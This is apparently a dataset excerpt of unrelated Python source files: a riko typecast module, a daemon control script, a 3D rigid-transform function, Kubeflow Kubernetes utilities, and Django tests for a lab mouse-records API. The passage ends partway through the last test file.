content
stringlengths 5
1.05M
|
---|
# -*- coding: utf-8 -*-
# vim: sw=4:ts=4:expandtab
"""
riko.modules.typecast
~~~~~~~~~~~~~~~~~~~~~
Provides functions for casting fields into specific types.
Examples:
basic usage::
>>> from riko.modules.typecast import pipe
>>>
>>> conf = {'type': 'date'}
>>> next(pipe({'content': '5/4/82'}, conf=conf))['typecast']['year']
1982
Attributes:
OPTS (dict): The default pipe options
DEFAULTS (dict): The default parser options
"""
import pygogo as gogo
from . import processor
from riko.utils import cast
OPTS = {'field': 'content'}
DEFAULTS = {'type': 'text'}
logger = gogo.Gogo(__name__, monolog=True).logger
def parser(content, objconf, skip=False, **kwargs):
""" Parsers the pipe content
Args:
content (scalar): The content to cast
objconf (obj): The pipe configuration (an Objectify instance)
skip (bool): Don't parse the content
kwargs (dict): Keyword arguments
Kwargs:
assign (str): Attribute to assign parsed content (default: typecast)
stream (dict): The original item
Returns:
dict: The item
Examples:
>>> from meza.fntools import Objectify
>>>
>>> item = {'content': '1.0'}
>>> objconf = Objectify({'type': 'int'})
>>> kwargs = {'stream': item, 'assign': 'content'}
>>> parser(item['content'], objconf, **kwargs)
1
"""
return kwargs['stream'] if skip else cast(content, objconf.type)
@processor(DEFAULTS, isasync=True, **OPTS)
def async_pipe(*args, **kwargs):
"""A processor module that asynchronously parses a URL into its components.
Args:
item (dict): The entry to process
kwargs (dict): The keyword arguments passed to the wrapper
Kwargs:
conf (dict): The pipe configuration. May contain the key 'type'.
type (str): The object type to cast to (default: text)
assign (str): Attribute to assign parsed content (default: typecast)
field (str): Item attribute to operate on (default: 'content')
Returns:
Deferred: twisted.internet.defer.Deferred item with type casted content
Examples:
>>> from riko.bado import react
>>> from riko.bado.mock import FakeReactor
>>>
>>> def run(reactor):
... callback = lambda x: print(next(x)['typecast'])
... d = async_pipe({'content': '1.0'}, conf={'type': 'int'})
... return d.addCallbacks(callback, logger.error)
>>>
>>> try:
... react(run, _reactor=FakeReactor())
... except SystemExit:
... pass
...
1
"""
return parser(*args, **kwargs)
@processor(DEFAULTS, **OPTS)
def pipe(*args, **kwargs):
"""A processor that parses a URL into its components.
Args:
item (dict): The entry to process
kwargs (dict): The keyword arguments passed to the wrapper
Kwargs:
conf (dict): The pipe configuration. May contain the key 'type'.
type (str): The object type to cast to (default: text)
assign (str): Attribute to assign parsed content (default: typecast)
field (str): Item attribute to operate on (default: 'content')
Yields:
dict: an item with type casted content
Examples:
>>> from datetime import datetime as dt
>>> next(pipe({'content': '1.0'}, conf={'type': 'int'}))['typecast']
1
>>> item = {'content': '5/4/82'}
>>> conf = {'type': 'date'}
>>> date = next(pipe(item, conf=conf, emit=True))['date']
>>> date.isoformat() == '1982-05-04T00:00:00+00:00'
True
>>> item = {'content': dt(1982, 5, 4).timetuple()}
>>> date = next(pipe(item, conf=conf, emit=True))['date']
>>> date.isoformat() == '1982-05-04T00:00:00+00:00'
True
>>> item = {'content': 'False'}
>>> conf = {'type': 'bool'}
>>> next(pipe(item, conf=conf, emit=True))
False
"""
return parser(*args, **kwargs)
|
import os
import sys
import json
import time
import signal
import psutil
import filelock
import webbrowser
from fable import config
from fable.back.http_server import run
def status():
try:
with open(config.INFO) as f:
info = json.loads(f.read())
if info['pid'] >= 0 and psutil.pid_exists(info['pid']):
return info['pid'], info['url']
except FileNotFoundError:
pass
return -1, -1
def print_status():
with filelock.FileLock(config.LOCK):
pid, url = status()
if pid < 0:
print('No running Fable processes found')
else:
print('Fable runs: pid', pid, 'url', url)
def start():
os.makedirs(config.FOLD, exist_ok=True)
with filelock.FileLock(config.LOCK):
pid, url = status()
if pid >= 0:
print('Fable already runs (pid ' + str(pid) + ') on address', url)
return
with open(config.INFO, 'w') as f:
link = 'http://{0}:{1}/{2}'.format(config.host, config.port, config.root)
f.write(json.dumps({'pid': os.getpid(), 'url': link}))
try:
run()
finally:
with filelock.FileLock(config.LOCK):
os.remove(config.INFO)
def stop():
os.makedirs(config.FOLD, exist_ok=True)
with filelock.FileLock(config.LOCK):
pid, _ = status()
if pid < 0:
print('Warning: no running Fable processes found')
return
try:
print('Sstoping term signal to (pid ' + str(pid) + ')')
os.kill(pid, signal.SIGINT)
except OSError:
pass
for w in [0, 1, 4]:
time.sleep(w)
if not psutil.pid_exists(pid):
return
print('Could not stop Fable (pid ' + str(pid) + ') on port', port)
def open_browser():
with filelock.FileLock(config.LOCK):
pid, url = status()
if pid < 0:
print('No running Fable processes found')
else:
url = url.replace('0.0.0.0', 'localhost')
webbrowser.open_new_tab(url)
def spawnDaemon(func):
# From: https://stackoverflow.com/questions/6011235/run-a-program-from-python-and-have-it-continue-to-run-after-the-script-is-kille
# do the UNIX double-fork magic, see Stevens' "Advanced Programming in the UNIX Environment" for details (ISBN 0201563177)
try:
pid = os.fork()
if pid > 0:
# parent process, return and keep running
return
except OSError as e:
print("fork #1 failed: %d (%s)" % (e.errno, e.strerror), file=sys.stderr)
sys.exit(1)
os.setsid()
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
sys.exit(0)
except OSError as e:
print("fork #2 failed: %d (%s)" % (e.errno, e.strerror), file=sys.stderr)
sys.exit(1)
# do stuff
func()
# all done
os._exit(os.EX_OK)
def main():
choices = ('start', 'stop', 'status', 'browser')
if len(sys.argv) < 2 or sys.argv[1] not in choices:
print('Usage:', sys.argv[0], '|'.join(choices) + ' [port Number] [host Number] [root String]')
return
if sys.argv[1] == 'start':
spawnDaemon(start)
elif sys.argv[1] == 'status':
print_status()
elif sys.argv[1] == 'browser':
open_browser()
elif sys.argv[1] == 'stop':
stop()
if __name__ == "__main__":
main()
|
#!/usr/bin/python
from numpy import *
from math import sqrt
# Input: expects 3xN matrix of points
# Returns R,t
# R = 3x3 rotation matrix
# t = 3x1 column vector
def rigid_transform_3D(A, B):
assert len(A) == len(B)
num_rows, num_cols = A.shape;
if num_rows != 3:
raise Exception("matrix A is not 3xN, it is {}x{}".format(num_rows, num_cols))
[num_rows, num_cols] = B.shape;
if num_rows != 3:
raise Exception("matrix B is not 3xN, it is {}x{}".format(num_rows, num_cols))
# find mean column wise
centroid_A = mean(A, axis=1)
centroid_B = mean(B, axis=1)
# ensure centroids are 3x1 (necessary when A or B are
# numpy arrays instead of numpy matrices)
centroid_A = centroid_A.reshape(-1, 1)
centroid_B = centroid_B.reshape(-1, 1)
# subtract mean
Am = A - tile(centroid_A, (1, num_cols))
Bm = B - tile(centroid_B, (1, num_cols))
H = matmul(Am, transpose(Bm))
# sanity check
#if linalg.matrix_rank(H) < 3:
# raise ValueError("rank of H = {}, expecting 3".format(linalg.matrix_rank(H)))
# find rotation
U, S, Vt = linalg.svd(H)
R = Vt.T * U.T
# special reflection case
if linalg.det(R) < 0:
print("det(R) < R, reflection detected!, correcting for it ...\n");
Vt[2,:] *= -1
R = Vt.T * U.T
t = -R*centroid_A + centroid_B
return R, t
|
# Lint as: python2, python3
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for the kubernetes related functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import enum
import os
from typing import Text
from kubernetes import client as k8s_client
from kubernetes import config as k8s_config
# Name of the main container that Argo workflow launches. As KFP internally uses
# Argo, container name for the KFP Pod is also the same.
# https://github.com/argoproj/argo/blob/master/workflow/common/common.go#L14
ARGO_MAIN_CONTAINER_NAME = 'main'
# Set of environment variables that are set in the KubeFlow Pipelines pods.
KFP_POD_NAME = 'KFP_POD_NAME'
KFP_NAMESPACE = 'KFP_NAMESPACE'
class PodPhase(enum.Enum):
"""Phase of the Kubernetes Pod.
Pod phases are defined in
https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#pod-phase.
"""
PENDING = 'Pending'
RUNNING = 'Running'
SUCCEEDED = 'Succeeded'
FAILED = 'Failed'
UNKNOWN = 'Unknown'
@property
def is_done(self):
return self == self.SUCCEEDED or self == self.FAILED
class RestartPolicy(enum.Enum):
"""Restart policy of the Kubernetes Pod container.
Restart policies are defined in
https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#restart-policy
"""
ALWAYS = 'Always'
ON_FAILURE = 'OnFailure'
NEVER = 'Never'
class PersistentVolumeAccessMode(enum.Enum):
"""Access mode of the Kubernetes Persistent Volume.
Access modes are defined in
https://kubernetes.io/docs/concepts/storage/persistent-volumes/#access-modes
"""
READ_WRITE_ONCE = 'ReadWriteOnce'
READ_ONLY_MANY = 'ReadOnlyMany'
READ_WRITE_MANY = 'ReadWriteMany'
class _KubernetesClientFactory(object):
"""Factory class for creating kubernetes API client."""
def __init__(self):
self._config_loaded = False
self._inside_cluster = False
@property
def inside_cluster(self):
"""Whether current environment is inside the kubernetes cluster."""
if not self._config_loaded:
self._LoadConfig()
return self._inside_cluster
def _LoadConfig(self) -> None: # pylint: disable=invalid-name
"""Load the kubernetes client config.
Depending on the environment (whether it is inside the running kubernetes
cluster or remote host), different location will be searched for the config
file. The loaded config will be used as a default value for the clients this
factory is creating.
If config is already loaded, it is a no-op.
Raises:
kubernetes.config.ConfigException: If fails to locate configuration in
current environment.
"""
try:
# If this code is running inside Kubernetes Pod, service account admission
# controller [1] sets volume mounts in which the service account tokens
# and certificates exists, and it can be loaded using
# `load_incluster_config()`.
#
# [1]
# https://kubernetes.io/docs/reference/access-authn-authz/service-accounts-admin/#service-account-admission-controller
self._inside_cluster = True
k8s_config.load_incluster_config()
except k8s_config.ConfigException:
# If loading incluster config fails, it means we're not running the code
# inside Kubernetes cluster. We try to load ~/.kube/config file, or the
# filename from the KUBECONFIG environment variable.
# It will raise kubernetes.config.ConfigException if no kube config file
# is found.
self._inside_cluster = False
k8s_config.load_kube_config()
self._config_loaded = True
def MakeCoreV1Api(self) -> k8s_client.CoreV1Api: # pylint: disable=invalid-name
"""Make a kubernetes CoreV1Api client."""
if not self._config_loaded:
self._LoadConfig()
return k8s_client.CoreV1Api()
_factory = _KubernetesClientFactory()
def make_core_v1_api() -> k8s_client.CoreV1Api:
"""Make a kubernetes CoreV1Api client."""
return _factory.MakeCoreV1Api()
def is_inside_cluster() -> bool:
"""Whether current running environment is inside the kubernetes cluster."""
return _factory.inside_cluster
def is_inside_kfp() -> bool:
"""Whether current running environment is inside the KFP runtime."""
return (
is_inside_cluster()
and KFP_POD_NAME in os.environ
and KFP_NAMESPACE in os.environ
)
def get_kfp_namespace() -> Text:
"""Get kubernetes namespace for the KFP.
Raises:
RuntimeError: If KFP pod cannot be determined from the environment, i.e.
this program is not running inside the KFP.
Returns:
The namespace of the KFP app, to which the pod this program is running on
belongs.
"""
try:
return os.environ[KFP_NAMESPACE]
except KeyError:
raise RuntimeError('Cannot determine KFP namespace from the environment.')
def get_current_kfp_pod(client: k8s_client.CoreV1Api) -> k8s_client.V1Pod:
"""Get manifest of the KFP pod in which this program is running.
Args:
client: A kubernetes CoreV1Api client.
Raises:
RuntimeError: If KFP pod cannot be determined from the environment, i.e.
this program is not running inside the KFP.
Returns:
The manifest of the pod this program is running on.
"""
try:
namespace = os.environ[KFP_NAMESPACE]
pod_name = os.environ[KFP_POD_NAME]
return client.read_namespaced_pod(name=pod_name, namespace=namespace)
except KeyError:
raise RuntimeError('Cannot determine KFP pod from the environment.')
|
import os
from django.test import TestCase
from rest_framework.test import APIRequestFactory
from .mvc_model.Error import DuplicationMouseError
from .mvc_model.databaseAdapter import GenericSqliteConnector
from .mvc_model.mouseFilter import MouseFilter, FilterOption
from .views import harvested_mouse_list, harvested_mouse_force_list
from .views import harvested_mouse_insertion
from .views import harvested_mouse_update
from .views import harvested_mouse_delete
from .models import HarvestedMouse, HarvestedBasedNumber, HarvestedAdvancedNumber
from datetime import datetime, timedelta
# Use in MVC model test
from harvestmouseapp.mvc_model.model import Mouse, MouseList, Record, AdvancedRecord
from harvestmouseapp.mvc_model.mouseAdapter import XmlModelAdapter, JsonModelAdapter
from harvestmouseapp.mvc_model.mouseViewer import XmlMouseViewer, JsonMouseViewer
import random
import string
import time
import copy
############################################
# Function name: create_mouse_object
# Description:
# This function creats the mouse object and transform based on the transfom object
############################################
def create_mouse_object(physical_id, handler, gender, mouseline, genotype,
birth_date, end_date, cog, phenotype, project_title, experiment, comment,
pfa_record, freeze_record):
harvested_mouse = Mouse(
handler=handler,
physical_id=physical_id,
gender=gender,
mouseline=mouseline,
genotype=genotype,
birth_date=birth_date,
end_date=end_date,
cog=cog,
phenotype=phenotype,
project_title=project_title,
experiment=experiment,
comment=comment
)
harvested_mouse.pfa_record = pfa_record
harvested_mouse.freeze_record = freeze_record
return harvested_mouse
############################################
# Function name: is_match_data
# Description:
# This function provide the functionality to which to match the provided target value with the data in the
# given response data
############################################
def is_match_data(data, keyword, target, child_keyword=None):
if isinstance(data, Mouse):
if not child_keyword:
if data.__dict__[keyword] == target:
return True
else:
if data.__dict__[keyword][child_keyword] == target:
return True
else:
for raw_data in data:
if not child_keyword:
if raw_data[keyword] == target:
return True
else:
if raw_data[keyword][child_keyword] == target:
return True
return False
############################################
# Function name: remove_if_matched
# Description: This function provide the functionality
# to delete a list of objects in the listToMatched
# with corresponding objects in the data of the response
############################################
def remove_if_matched(data, keyword, list_to_matched, child_keyword=None):
keyword = '_Mouse__'+keyword
if child_keyword:
if 'liver' in child_keyword or 'others' in child_keyword:
child_keyword = '_Record__' + child_keyword
else:
child_keyword = '_AdvancedRecord__' + child_keyword
if isinstance(data, list):
for raw_data in data:
raw_data = raw_data.__dict__
if not child_keyword:
target_value = raw_data[keyword]
else:
target_value = raw_data[keyword].__dict__[child_keyword]
if target_value in list_to_matched:
list_to_matched.remove(target_value)
else:
if not child_keyword:
target_value = data[keyword]
else:
target_value = data[keyword].__dict__[child_keyword]
if target_value in list_to_matched:
list_to_matched.remove(target_value)
############################################
# Function name: make_request_and_check
# Description: This function provides the different type request
# to the target Url based on the type of request, url and
# it will check the correct status code with the provided
# status code
############################################
def make_request_and_check(test_cases, data, url, request_object, expected_status_code, view_class,
is_view_class=False, viewer=None):
if viewer:
data = viewer.transform(data)
request = request_object(
path=url,
data=data,
format='json'
)
if is_view_class:
response = view_class.as_view()(request, *[], **{})
else:
response = view_class(request)
# Request is failed
if response.status_code != expected_status_code:
test_cases.assertTrue(False, 'Returned: ' + str(response.status_code))
return response
############################################
# Function name: make_request_and_check
# Description: This function provides the functionality to force
# force reset the mouse list in the database
############################################
def force_refresh_cache(test_cases):
make_request_and_check(
test_cases=test_cases,
data=None,
url='/harvestedmouse/force_list',
request_object=test_cases.factory.get,
expected_status_code=200,
view_class=harvested_mouse_force_list
)
############################################
# Function name: check_model_view_objects
# Description: This function checks the data in the response data
# of matched with the given number
############################################
def check_model_view_objects(test_cases, view_list_class, view_url, expect_num_of_return, list_to_matched,
expect_num_of_remain, keyword, remove_involved=True, target=None, find_matched=False,
is_view_class=False, data=None, child_keyword=None, adapter=None):
# Check if the return of list of users matched with the listToMatched
# Create an instance of GET requests
if data is None:
request = test_cases.factory.get(
path=view_url
)
else:
request = test_cases.factory.get(
data=data,
path=view_url,
format='json'
)
if is_view_class:
response = view_list_class().as_view()(request, *[], **{})
else:
response = view_list_class(request)
data = adapter.transform(response.data)
is_list_and_size_is_expected = False
if isinstance(data, MouseList):
if len(data) == expect_num_of_return:
is_list_and_size_is_expected = True
if (isinstance(data, Mouse) and expect_num_of_return == 1) or is_list_and_size_is_expected:
# Remove all the user in the listToMatched if it exists in the data of the response
if remove_involved:
if '_mouse_list' in data.__dict__.keys():
data = data.__dict__['_mouse_list']
else:
data = data.__dict__
remove_if_matched(data, keyword, list_to_matched, child_keyword)
# If the list is not empty,
# it means the list getting from the
# view is incorrect
if not (len(list_to_matched) == expect_num_of_remain):
test_cases.assertTrue(False)
else:
if find_matched:
if not (is_match_data(data, keyword, target, child_keyword)):
test_cases.assertTrue(False)
else:
if is_match_data(data, keyword, target, child_keyword):
test_cases.assertTrue(False)
else:
# Number of items retrieve was wrong
test_cases.assertTrue(False)
##############################################################################################################
# Unit Test name: Harvested Mouse test case
# Target: HarvestedMouse Object
# Description:
# 1. With predefined inserted mouse the function successfully retrieve the correct information
# 2. The API able to create new mouse entry based on the provided information
##############################################################################################################
class HarvestedMouseTestCase(TestCase):
# Setup function, insert required objects into the database
def setUp(self) -> None:
# Every test should use factory object to spawn the request object
self.factory = APIRequestFactory()
self.viewer = JsonMouseViewer()
self.adapter = JsonModelAdapter()
harvested_mouse = HarvestedMouse(
handler='handler1',
physicalId='12345678',
gender='M',
mouseLine='mouseLine1',
genoType='genoType1',
birthDate=datetime.now().date(),
endDate=datetime.now().date(),
confirmationOfGenoType=True,
phenoType='phenoType1',
projectTitle='projectTitle1',
experiment='experiementTesting',
comment='comment1'
)
harvested_mouse.save()
freeze_record = HarvestedBasedNumber(
harvestedMouseId=harvested_mouse,
liver=1,
liverTumor=1,
others='3'
)
freeze_record.save()
pfa_record = HarvestedAdvancedNumber(
harvestedMouseId=harvested_mouse,
liver=1,
liverTumor=1,
smallIntestine=1,
smallIntestineTumor=1,
skin=1,
skinHair=1,
others='5'
)
pfa_record.save()
# Pass requirement
# 1. create the user with required field
# 2. use REST Api to retrieve the information without 404
# 3. matched with the required field set in the first requirement
def test_harvest_mouse_insert(self):
data_to_post = create_mouse_object(
handler='handler2',
physical_id='12345679',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
# Make a Request to list all the harvested mouse
# and use the list to matched to all the list of the harvested mouse
# It will remove from the retrived mouse list.
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=2,
list_to_matched=['handler1', 'handler2'],
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
# Pass requirement
# 1. create the user with required field
# 2. use REST Api to filter and retrieve the information without 404
# 3. matched with the required field set in the first requirement
def test_filter_harvest_mouse_list(self):
force_refresh_cache(self)
data_to_post = create_mouse_object(
handler='handler1',
physical_id='12345679',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
data_to_post = create_mouse_object(
handler='handler2',
physical_id='1234567A',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
# Make a Request to list all the harvested mouse
# and use the list to matched to all the list of the harvested mouse
# It will remove from the retrived mouse list.
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=2,
list_to_matched=['handler1'],
expect_num_of_remain=0,
keyword='handler',
data={
'filter': 'handler@handler1'
},
adapter=self.adapter
)
# Pass requirement
# 1. Create arbitrary number of harvested mouse entries
# 2. Query with multiple different key
# 3. matched with the required field set in the 1st and 2nd requirement
def test_filter_advanced_harvest_mouse_list(self):
force_refresh_cache(self)
# Insert with multiple handler 0 to 4 but with the same Expr1
# Insert with multiple handler 5 to 8 but with same Expr2
# It should return handler 1 to handler 3 if filtered with Expr1
# But exclude the default entry
experiment_1 = 'Expr1'
experiment_2 = 'Expr2'
normal_pheno = 'normal'
special_pheno = 'speical'
group_1_start = 0
group_1_stop = 4
group_2_stop = 8
list_to_matched = []
for i in range(group_1_start, group_2_stop):
if i <= group_1_stop:
experiment = experiment_1
if i <= group_1_stop - 2:
pheno = special_pheno
list_to_matched.append('handler' + str(i))
else:
pheno = normal_pheno
else:
experiment = experiment_2
pheno = normal_pheno
data_to_post = create_mouse_object(
handler='handler' + str(i),
physical_id='1234567A' + str(i),
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype=pheno,
project_title='projectTitle1',
experiment=experiment,
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
filter_option = 'experiment@{}$phenotype@{}'.format(experiment_1, special_pheno)
# Make a Request to list all the harvested mouse
# and use the list to matched to all the list of the harvested mouse
# It will remove from the retrieved mouse list.
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=group_1_stop - 1,
list_to_matched=list_to_matched,
expect_num_of_remain=0,
keyword='handler',
data={
'filter': filter_option
},
adapter=self.adapter
)
# Pass requirement
# 1. Create arbitrary number of harvested mouse entries
# 2. Query with multiple different key
# 3. matched with the required field set in the 1st and 2nd requirement
def test_filter_datetime_harvest_mouse_list(self):
force_refresh_cache(self)
# Insert with multiple handler 0 to 4 but with the same Expr1
# Insert with multiple handler 5 to 8 but with same Expr2
# It should return handler 1 to handler 3 if filtered with Expr1
# But exclude the default entry
group_1_start = 0
group_2_start = 5
group_2_stop = 8
list_to_matched = []
specific_date = datetime.now()
for i in range(group_1_start, group_2_stop):
cur_date = datetime.now().date() + timedelta(days=i)
if i == group_2_start:
specific_date = cur_date
if i >= group_2_start:
list_to_matched.append('handler' + str(i))
data_to_post = create_mouse_object(
handler='handler' + str(i),
physical_id='1234567A' + str(i),
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=cur_date,
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='Experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=JsonMouseViewer()
)
filter_option = 'birth_date@{}@{}'.format(str(specific_date), 0)
# Make a Request to list all the harvested mouse
# and use the list to matched to all the list of the harvested mouse
# It will remove from the retrieved mouse list.
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=group_2_stop - group_2_start,
list_to_matched=list_to_matched.copy(),
expect_num_of_remain=0,
keyword='handler',
data={
'filter': filter_option
},
adapter=JsonModelAdapter()
)
list_to_matched.remove('handler' + str(group_2_stop - 1))
# Make a Request to list all the harvested mouse
# and use the list to matched to all the list of the harvested mouse
# It will remove from the retrieved mouse list.
# The remaining should be 0
filter_option = 'birth_date@{}@{}$birth_date@{}@{}'.format(
str(specific_date), 0, str(specific_date + timedelta(days=1)), 2)
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=group_2_stop - group_2_start - 1,
list_to_matched=list_to_matched,
expect_num_of_remain=0,
keyword='handler',
data={
'filter': filter_option
},
adapter=JsonModelAdapter()
)
# Pass requirement
# 1. Insert multiple mouses at one time
# 2. matched with the required field set
def test_advanced_harvest_mouse_insert_multiple(self):
# Force get the new mouse list from the db
force_refresh_cache(self)
list_to_matched = []
group_start = 0
group_stop = 8
mouse_list = MouseList()
for i in range(group_start, group_stop):
list_to_matched.append('handler' + str(i))
data_to_post = create_mouse_object(
handler='handler' + str(i),
physical_id='1234567A' + str(i),
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
mouse_list.add_mouse(data_to_post)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=mouse_list,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=mouse_list.get_size() + 1,
list_to_matched=list_to_matched,
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
# Pass requirement
# 1. Insert multiple mouses at one time
# 2. matched with the required field set
def test_harvest_mouse_update(self):
# Force get the new mouse list from the db
force_refresh_cache(self)
data_to_post = create_mouse_object(
handler='handler1',
physical_id='12345679',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
# Change handler to handler2
data_to_post.handler = 'handler2'
# Change pfaRecord.smallIntestineTumor to 15
data_to_post.pfa_record.small_intenstine_tumor = 15
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/update',
request_object=self.factory.put,
expected_status_code=200,
view_class=harvested_mouse_update,
viewer=self.viewer
)
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=2,
list_to_matched=['handler1', 'handler2'],
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=2,
list_to_matched=[1, 15],
expect_num_of_remain=0,
keyword='pfa_record',
child_keyword='small_intenstine_tumor',
adapter=self.adapter
)
# Pass requirement
# 1. Insert multiple mouses at one time
# 2. matched with the required field set
def test_advanced_harvest_mouse_multiple_update(self):
# Force get the new mouse list from the db
force_refresh_cache(self)
data_to_post_2 = create_mouse_object(
handler='handler2',
physical_id='12345679',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
data_to_post_3 = create_mouse_object(
handler='handler3',
physical_id='1234567B',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
mouse_list = MouseList()
mouse_list.add_mouse([data_to_post_2, data_to_post_3])
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=mouse_list,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
# Change handler to handler2
data_to_post_2.project_title = 'ABC'
# Change handler to handler2
data_to_post_3.project_title = 'CBA'
# Change pfaRecord.smallIntestineTumor to 16
data_to_post_2.pfa_record.small_intenstine_tumor = 16
# Change pfaRecord.smallIntestineTumor to 15
data_to_post_3.pfa_record.small_intenstine_tumor = 15
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=mouse_list,
url='/harvestedmouse/update',
request_object=self.factory.put,
expected_status_code=200,
view_class=harvested_mouse_update,
viewer=self.viewer
)
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=3,
list_to_matched=['ABC', 'CBA'],
expect_num_of_remain=0,
keyword='project_title',
adapter=self.adapter
)
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=3,
list_to_matched=[1, 16, 15],
expect_num_of_remain=0,
keyword='pfa_record',
